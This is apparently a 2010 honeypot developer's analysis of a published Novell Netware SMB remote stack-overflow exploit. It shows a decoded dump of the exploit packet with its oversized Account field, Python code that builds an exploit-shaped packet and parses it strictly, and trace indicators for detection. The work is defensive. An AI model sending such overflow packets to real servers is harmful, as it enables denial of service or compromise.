Netware SMB Remote Stack Overflow

I just had a look at the Novell Netware exploit published by Laurent Gaffié, and I'm glad other people have problems parsing SMB correctly too. Contrary to the other exploits addressing Microsoft's SMB stack, this one exploits a parsing bug instead of a DCE RPC call.

###[ NBT Session Packet sizeof(4) ]### 
  TYPE                = Session Message sizeof(  1) off=  0 goff=  0
  RESERVED            = 0               sizeof(  1) off=  1 goff=  1
  LENGTH              = 318             sizeof(  2) off=  2 goff=  2
###[ SMB Header sizeof(32) ]### 
     Start               = b'\xffSMB'      sizeof(  4) off=  0 goff=  4
     Status              = 0               sizeof(  4) off=  5 goff=  9
     Flags               = CANON           sizeof(  1) off=  9 goff= 13
     Flags2              =                 sizeof(  2) off= 10 goff= 14
     PIDHigh             = 0               sizeof(  2) off= 12 goff= 16
     Signature           = 0               sizeof(  8) off= 14 goff= 18
     Unused              = 0               sizeof(  2) off= 22 goff= 26
     TID                 = 0               sizeof(  2) off= 24 goff= 28
     PID                 = 6649            sizeof(  2) off= 26 goff= 30
     UID                 = 1               sizeof(  2) off= 28 goff= 32
     MID                 = 24961           sizeof(  2) off= 30 goff= 34
###[ SMB Sessionsetup AndX Request2 sizeof(114) ]### 
        WordCount           = 13              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_TREE_CONNECT_ANDX sizeof(  1) off=  1 goff= 37
        AndXReserved        = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 122             sizeof(  2) off=  3 goff= 39
        MaxBufferSize       = 2920            sizeof(  2) off=  5 goff= 41
        MaxMPXCount         = 50              sizeof(  2) off=  7 goff= 43
        VCNumber            = 0               sizeof(  2) off=  9 goff= 45
        SessionKey          = 0               sizeof(  4) off= 11 goff= 47
        PasswordLength      = 24              sizeof(  2) off= 15 goff= 51
        UnicodePasswordLength= 0               sizeof(  2) off= 17 goff= 53
        Reserved2           = 0               sizeof(  4) off= 19 goff= 55
        Capabilties         = UNICODE         sizeof(  4) off= 23 goff= 59
        ByteCount           = 61              sizeof(  2) off= 27 goff= 63
        Password            = b'(\xd4\xce\xd7\x93\xc8\x8b\x16_B*z\xfd\x15z\xfd\x15z\xfdAAAAA' sizeof( 24) off= 29 goff= 65
        UnicodePassword     = b''             sizeof(  0) off= 53 goff= 89
        Padding             = b'A'            sizeof(  1) off= 53 goff= 89
        Account             = b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xef\xa5B^\\-K\x1a\x1cYO\x00' sizeof(206) off= 54 goff= 90
        PrimaryDomain       = b'WORKGROUP\x00' sizeof( 10) off=260 goff=296
        NativeOS            = b'Windows 4.0\x00' sizeof( 12) off=270 goff=306
        NativeLanManager    = b'Windows 4.0\x00' sizeof( 12) off=282 goff=318
        Extrabytes          = b''             sizeof(-180) off=294 goff=330
###[ SMB Treeconnect AndX Request sizeof(42) ]### 
           WordCount           = 4               sizeof(  1) off=  0 goff=150
           AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff=151
           Reserved1           = 0               sizeof(  1) off=  2 goff=152
           AndXOffset          = 0               sizeof(  2) off=  3 goff=153
           Flags               = 0x2             sizeof(  2) off=  5 goff=155
           PasswordLength      = 1               sizeof(  2) off=  7 goff=157
           ByteCount           = 31              sizeof(  2) off=  9 goff=159
           Password            = b'\x00'         sizeof(  1) off= 11 goff=161
           Path                = b'\\\\WIN-E7J0ONIMSE3\\USERS\x00' sizeof( 24) off= 12 goff=162
           Service             = b'?????\x00'    sizeof(  6) off= 36 goff=186
           Extrabytes          = b'\x00'         sizeof(  0) off= 42 goff=192

Sessionsetup AndX / Treeconnect AndX

the exploit

The exploit's description says the large Account string causes a stack overflow.
My guess, which is the best I can do since I have no Netware to test against, is that they relied on the SMB_Sessionsetup_AndX.ByteCount value to size a buffer on the stack. As ByteCount is meant to indicate the length of the rest of the packet, the assumption is valid in itself, but, as usual, relying on a user-provided value is not. Note that the packet looks consistent to a parser that only checks the declared lengths: AndXOffset is 122, which is exactly where a 61-byte data block ends (32 bytes of SMB header, 1 byte WordCount, 26 bytes of words, 2 bytes ByteCount, 61 bytes of data), so only the NUL-terminated strings, which run far past that point, give it away.

Pretty cool to see something which exploits a parsing bug and uses SMB AndX chaining.

wireshark

wireshark failed to decode the chained Treeconnect_AndX, and the preceding SMB_Sessionsetup_AndX.NativeLanManager field is not decoded correctly either, but my wireshark is not current and there have been lots of changes in trunk-1.4, so maybe this is fixed already.

dionaea

dionaea had its problems decoding the packet too, but as we use Python to interpret the packet, it failed better: all I got was an exception.
The problem was the chaining. This is the first chained request I have seen, so chaining was not implemented correctly, but it was easy to hardcode a fix to get the packet parsed.
As you can see, the length of the SMB_Sessionsetup_AndX.Extrabytes field, which is used to calculate some kind of padding, is negative (-180), because ByteCount is much smaller than it should be.
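To make the ByteCount problem concrete, here is an added example; it is my own code, not dionaea's dissector and not the exploit. It builds a packet shaped like the dump above (ByteCount 61, a 205-byte Account plus NUL, a chained TreeConnect AndX for \\WIN-E7J0ONIMSE3\USERS) and walks the AndX chain twice: once bounding every string by the ByteCount the client declared, which rejects the packet, and once reading each string to its NUL wherever that lies, which is roughly what the dissector above did and which reports the same kind of negative slack. The password bytes, the count of 'A's and the placement of the TreeConnect block are constructed so that the chain is self-consistent; they are not the exploit's bytes, and nothing here reproduces the Netware side.

```python
import struct

SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75
SMB_COM_NONE = 0xFF        # AndXCommand value that ends the chain
CAP_UNICODE = 0x00000004

# per command: WordCount, struct format of the words, indexes of the words that are
# lengths of fixed-size data fields (passwords), names of the NUL-terminated strings
LAYOUT = {
    SMB_COM_SESSION_SETUP_ANDX: (13, "<BBHHHHIHHII", (7, 8),
                                 ("account", "domain", "native_os", "native_lanman")),
    SMB_COM_TREE_CONNECT_ANDX: (4, "<BBHHH", (4,), ("path", "service")),
}

class SmbParseError(Exception):
    pass

def read_cstring(buf, start, limit):
    # NUL-terminated string that must end before `limit`: bounded by the declared ByteCount
    # this rejects the exploit; bounded only by the packet it runs to whatever NUL comes next.
    end = buf.find(b"\x00", start, limit)
    if end < 0:
        raise SmbParseError("string at %d not terminated before %d" % (start, limit))
    return buf[start:end], end + 1

def parse_block(smb, command, off, strict):
    # One AndX request block (WordCount, words, ByteCount, data); also returns AndXCommand/AndXOffset.
    wordcount, fmt, length_words, strings = LAYOUT[command]
    if smb[off] != wordcount:
        raise SmbParseError("command 0x%02x: WordCount %d != %d" % (command, smb[off], wordcount))
    words = struct.unpack_from(fmt, smb, off + 1)
    bytecount, = struct.unpack_from("<H", smb, off + 1 + 2 * wordcount)
    data_start = off + 3 + 2 * wordcount
    data_end = data_start + bytecount
    if data_end > len(smb):
        raise SmbParseError("ByteCount %d runs past the end of the packet" % bytecount)
    limit = data_end if strict else len(smb)
    pos = data_start + sum(words[i] for i in length_words)   # skip the password fields
    block = {"command": command, "bytecount": bytecount, "data_end": data_end}
    for name in strings:
        block[name], pos = read_cstring(smb, pos, limit)
    block["slack"] = data_end - pos      # negative: fields consumed more than ByteCount declared
    return block, words[0], words[2]

def parse_chain(pkt, strict=True):
    # NBT session message + SMB header + AndX chain. strict=True bounds every string by the
    # declared ByteCount; strict=False reads to the next NUL in the packet and reports the slack.
    if len(pkt) < 36 or pkt[0] != 0x00:
        raise SmbParseError("not an NBT session message")
    nbt_len = ((pkt[1] & 1) << 16) | struct.unpack_from(">H", pkt, 2)[0]
    smb = pkt[4:4 + nbt_len]
    if len(smb) != nbt_len or smb[:4] != b"\xffSMB":
        raise SmbParseError("NBT length or SMB magic wrong")
    command, off, blocks, seen = smb[4], 32, [], set()
    while command != SMB_COM_NONE:
        if off in seen or not 32 <= off < len(smb):   # AndXOffset loop and bounds check
            raise SmbParseError("bad AndXOffset %d" % off)
        seen.add(off)
        try:
            block, command, next_off = parse_block(smb, command, off, strict)
        except (KeyError, struct.error, IndexError):
            raise SmbParseError("unsupported or truncated block at %d" % off) from None
        blocks.append(block)
        if command != SMB_COM_NONE and next_off < block["data_end"]:
            raise SmbParseError("AndXOffset %d points inside the previous block" % next_off)
        off = next_off
    return blocks

def build_session_setup_andx(account, bytecount=None, andx_cmd=SMB_COM_NONE, andx_off=0):
    password = b"\x00" * 24      # constructed placeholder for the 24 password bytes
    data = password + account + b"\x00WORKGROUP\x00Windows 4.0\x00Windows 4.0\x00"
    words = struct.pack("<BBHHHHIHHII", andx_cmd, 0, andx_off, 2920, 50, 0, 0,
                        len(password), 0, 0, CAP_UNICODE)
    return bytes([13]) + words + struct.pack("<H", len(data) if bytecount is None else bytecount) + data

def build_tree_connect_andx(path, service=b"?????"):
    data = b"\x00" + path + b"\x00" + service + b"\x00"    # 1-byte password, path, service
    words = struct.pack("<BBHHH", SMB_COM_NONE, 0, 0, 0x0002, 1)
    return bytes([4]) + words + struct.pack("<H", len(data)) + data

def build_chain(account, bytecount=None, path=b"\\\\SERVER\\SHARE", andx_off=None):
    sess = build_session_setup_andx(account, bytecount, SMB_COM_TREE_CONNECT_ANDX)
    if andx_off is None:
        andx_off = 32 + len(sess)         # TreeConnect follows the real SessionSetup data
    sess = build_session_setup_andx(account, bytecount, SMB_COM_TREE_CONNECT_ANDX, andx_off)
    header = (b"\xffSMB" + bytes([SMB_COM_SESSION_SETUP_ANDX]) + struct.pack("<IBHH", 0, 0x08, 0, 0)
              + bytes(8) + struct.pack("<HHHHH", 0, 0, 6649, 1, 24961))
    smb = header + sess + build_tree_connect_andx(path)
    return struct.pack(">BBH", 0, 0, len(smb)) + smb      # NBT session message

def exploit_shaped_packet():
    # shaped like the dump: ByteCount 61, 205 'A's plus NUL as Account, chained TreeConnect
    return build_chain(b"A" * 205, bytecount=61, path=b"\\\\WIN-E7J0ONIMSE3\\USERS")
```

parse_chain(exploit_shaped_packet()) raises SmbParseError on the Account string, because no NUL appears inside the 61-byte window the client declared. parse_chain(exploit_shaped_packet(), strict=False) returns two blocks: the SessionSetup with slack -203 (the fields actually occupy 264 bytes against the declared 61) and the TreeConnect with its path and service. The same walker also refuses an AndXOffset that points back into the previous block or repeats an offset already visited, which is the other thing chained requests need checked before a parser follows them.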

Maybe there is some value for others in this information, e.g. if you see the string \\\\WIN-E7J0ONIMSE3\\USERS or the bytes 28 d4 ce d7 93 c8 8b 16 5f 42 2a 7a fd 15 7a fd 15 7a fd 41 41 41 41 41 in your network traces.


2010/06/17/netware_smb_remote_stack_overflow.txt · Last modified: 2010/06/17 22:28 by common